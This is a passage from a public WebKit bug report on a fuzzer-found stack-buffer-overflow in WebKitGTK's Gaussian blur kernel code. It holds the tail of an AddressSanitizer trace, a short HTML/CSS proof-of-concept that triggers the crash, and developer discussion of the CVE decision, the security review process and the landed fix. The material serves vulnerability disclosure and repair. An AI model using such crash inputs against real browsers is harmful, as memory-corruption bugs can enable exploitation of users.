WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>, 0ul, 1ul>(WebKit::WebProcess&&, WebKit::WebProcess&&, std::integer_sequence<unsigned long, 0ul, 1ul>) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/tuple:1854:14 #21 0x7f4c07912bd1 in decltype(auto) std::apply<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess&&, WebKit::WebProcess&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/tuple:1865:14 #22 0x7f4c07912bd1 in void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:134:5 #23 0x7f4c07912bd1 in void IPC::handleMessage<Messages::WebProcess::CreateWebPage, WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&)>(IPC::Connection&, IPC::Decoder&, WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&)) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:236:9 #24 0x7f4c07912bd1 in WebKit::WebProcess::didReceiveWebProcessMessage(IPC::Connection&, IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/DerivedSources/WebKit/WebProcessMessageReceiver.cpp:122:16 #25 0x7f4c08c93deb in WebKit::WebProcess::didReceiveMessage(IPC::Connection&, IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebProcess.cpp:932:9 #26 0x7f4c0831fee0 in IPC::Connection::dispatchMessage(IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1233:15 #27 0x7f4c083204a5 in IPC::Connection::dispatchMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1281:9 #28 0x7f4c08320cb6 in IPC::Connection::dispatchOneIncomingMessage() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1346:5 #29 0x7f4c0832338f in IPC::Connection::enqueueIncomingMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >)::$_15::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1195:28 #30 0x7f4c0832338f in WTF::Detail::CallableWrapper<IPC::Connection::enqueueIncomingMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >)::$_15, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39 #31 0x7f4c0499d4a9 in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:82:35 #32 0x7f4c0499d4a9 in WTF::RunLoop::performWork() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:147:9 #33 0x7f4c04b07d98 in WTF::RunLoop::RunLoop()::$_1::operator()(void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:80:42 #34 0x7f4c04b07d98 in WTF::RunLoop::RunLoop()::$_1::__invoke(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:79:43 #35 0x7f4c04b05433 in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28 #36 0x7f4c04b05433 in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5 #37 0x7f4bfcb20c43 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x55c43) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:359:23 in WebCore::computeGaussianKernel(float, std::array<float, 6ul>&, std::array<float, 6ul>&) Shadow bytes around the buggy address: 0x0fe9f651cd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe9f651cd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe9f651cd80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe9f651cd90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe9f651cda0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0fe9f651cdb0: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00[04]f2 f2 0x0fe9f651cdc0: f2 f2 00 f2 f2 f2 00 00 00 f2 f2 f2 f2 f2 00 00 0x0fe9f651cdd0: 00 f2 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x0fe9f651cde0: f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 0x0fe9f651cdf0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f3 f3 f3 f3 f3 f3 0x0fe9f651ce00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==237950==ABORTING ``` 1. Proof-of-Concept ```cpp <style> .class2 { -webkit-filter: blur(0em) drop-shadow(91px 36px 1024em black); } x48,.class0:read-only { border-style: groove outset outset hidden; } *:nth-child(odd) { display: block table; } style { -webkit-animation: keyframes2,keyframes3 0.5s steps(454),ease-out alternate-reverse,normal both; } @keyframes keyframes3 { 40% { -webkit-transform: scaleX(43) } } </style> <a id="x56" ping="x" draggable="true" class="class2" translate="yes" itemtype="AAAAAAAA" charset="UTF-16" contextmenu="foo" slot="foo" webkitdropzone="copy" onfocus="f3()"> <image id="x21" tabindex="-1" preserveAspectRatio="xMaxYMax" buffered-rendering="dynamic" class="class0" paint-order="stroke markers" width="0px" vector-effect="non-scaling-stroke" clip="rect(auto,0px,auto,auto)" transform="rotate(180deg) translate(100%,284em)" x="16%"> ``` 1. Software Download Link a. https://webkitgtk.org/

Attachments
PoC file (835 bytes, text/html) 2023-12-01 05:29 PST, Park Sangwoo	no flags	Details
WIP patch (681 bytes, patch) 2023-12-03 13:09 PST, Fujii Hironori	no flags	Details Formatted Diff Diff
test case 2 (125 bytes, text/html) 2023-12-03 13:41 PST, Fujii Hironori	no flags	Details
Patch (3.37 KB, patch) 2023-12-05 20:01 PST, Fujii Hironori	no flags	Details Formatted Diff Diff
View All Add attachment proposed patch, testcase, etc.

Radar WebKit Bug Importer

Comment 1 2023-12-01 05:35:14 PST

<rdar://problem/119031226>

Fujii Hironori

Comment 2 2023-12-03 13:06:35 PST

Thank you very much for the report!

Fujii Hironori

Comment 3 2023-12-03 13:09:43 PST

Created attachment 468845 [details] WIP patch

Fujii Hironori

Comment 4 2023-12-03 13:41:54 PST

Created attachment 468846 [details] test case 2

Fujii Hironori

Comment 5 2023-12-03 13:53:37 PST

Hi, Brent. If a securty bug is assinged to webkit-unassigned@lists.webkit.org, comments are published like https://lists.webkit.org/pipermail/webkit-unassigned/2023-December/1136022.html Could you search securty bugs assinged to webkit-unassigned@lists.webkit.org?

Michael Catanzaro

Comment 6 2023-12-03 15:26:19 PST

I will request a CVE for this issue. (In reply to Fujii Hironori from comment #5) > Hi, Brent. > > If a securty bug is assinged to webkit-unassigned@lists.webkit.org, comments > are published like > https://lists.webkit.org/pipermail/webkit-unassigned/2023-December/1136022. > html Ouch...

Carlos Garcia Campos

Comment 7 2023-12-04 00:52:38 PST

The shadow blur patches were reverted in our stable branch because they broke rendering in rpi, so this might not affect 2.42.2.

Michael Catanzaro

Comment 8 2023-12-04 06:57:15 PST

OK great. Since no stable release is affected by this bug, and requesting CVEs for unstable releases that are only used by testers is not worthwhile, we don't need a CVE after all. But the bug still needs to be fixed in main, of course. (Good find; thanks for reporting this issue.) I had wondered why these patches had been reverted. If they broke rendering on Raspberry Pi and it's still broken in main, maybe we should revert them there too? Are we really comfortable with Raspberry Pi being broken?

Fujii Hironori

Comment 9 2023-12-04 11:53:23 PST

bug#261870 is tracking the rpi issue.

Fujii Hironori

Comment 10 2023-12-05 20:01:11 PST

Created attachment 468907 [details] Patch

Fujii Hironori

Comment 11 2023-12-05 20:55:40 PST

Invoking 'webkit-patch upload' complains. > The patch you are uploading references https://bugs.webkit.org/show_bug.cgi?id=265659 > https://bugs.webkit.org/show_bug.cgi?id=265659 matches 'project:Security' and is thus redacted > Please use 'git-webkit' to upload this fix. 'webkit-patch' does not support security changes Should I really use git-webkit for a security bug?

Fujii Hironori

Comment 12 2023-12-06 05:04:03 PST

Comment on attachment 468907 [details] Patch EWS doesn't process this patch. I have to create a GitHub pull request.

Michael Catanzaro

Comment 13 2023-12-06 06:07:08 PST

(In reply to Fujii Hironori from comment #11) > Should I really use git-webkit for a security bug? Just make sure it creates the pull request in the security repo and not the public repo.

Jonathan Bedard

Comment 14 2023-12-06 14:03:45 PST

Pull request: https://github.com/WebKit/WebKit-security/pull/50

Jonathan Bedard

Comment 15 2023-12-06 14:06:31 PST

I reached out to Fuji, he isn't part of the security group yet, so I've posted the PR for him to get it reviewed. As Michael points out, this hasn't shipped yet, so the PR is made against `main` in WebKit/WebKit-security, we'll land in public once the change is reviewed and clears EWS.

Michael Catanzaro

Comment 16 2023-12-14 05:40:20 PST

So in the pull request I requested the addition of a RELEASE_ASSERT() to make sure the buffer index is in range. I also approved the pull request. But finally I remembered that Fujii doesn't have access to the security repo yet and could not see any of my review feedback. I don't think we need to follow the standard security process for this particular bug because (a) it doesn't affect Apple products, and (b) it also doesn't affect stable releases of WPE/GTK (yet). It can't even land on our stable branches since the commit it fixes is reverted there, so the only place for the fix to land is main. Accordingly, I'm making this bug public now. Fujii, please prepare a pull request using the normal repo and we can get this landed. Thanks!

Fujii Hironori

Comment 17 2023-12-14 12:16:57 PST

Public PR: https://github.com/WebKit/WebKit/pull/21821

EWS

Comment 18 2023-12-14 16:11:55 PST

Committed 272081@main (15dc72ca9521): <https://commits.webkit.org/272081@main> Reviewed commits have been landed. Closing PR #21821 and removing active labels.

Note You need to log in before you can comment on or make changes to this bug.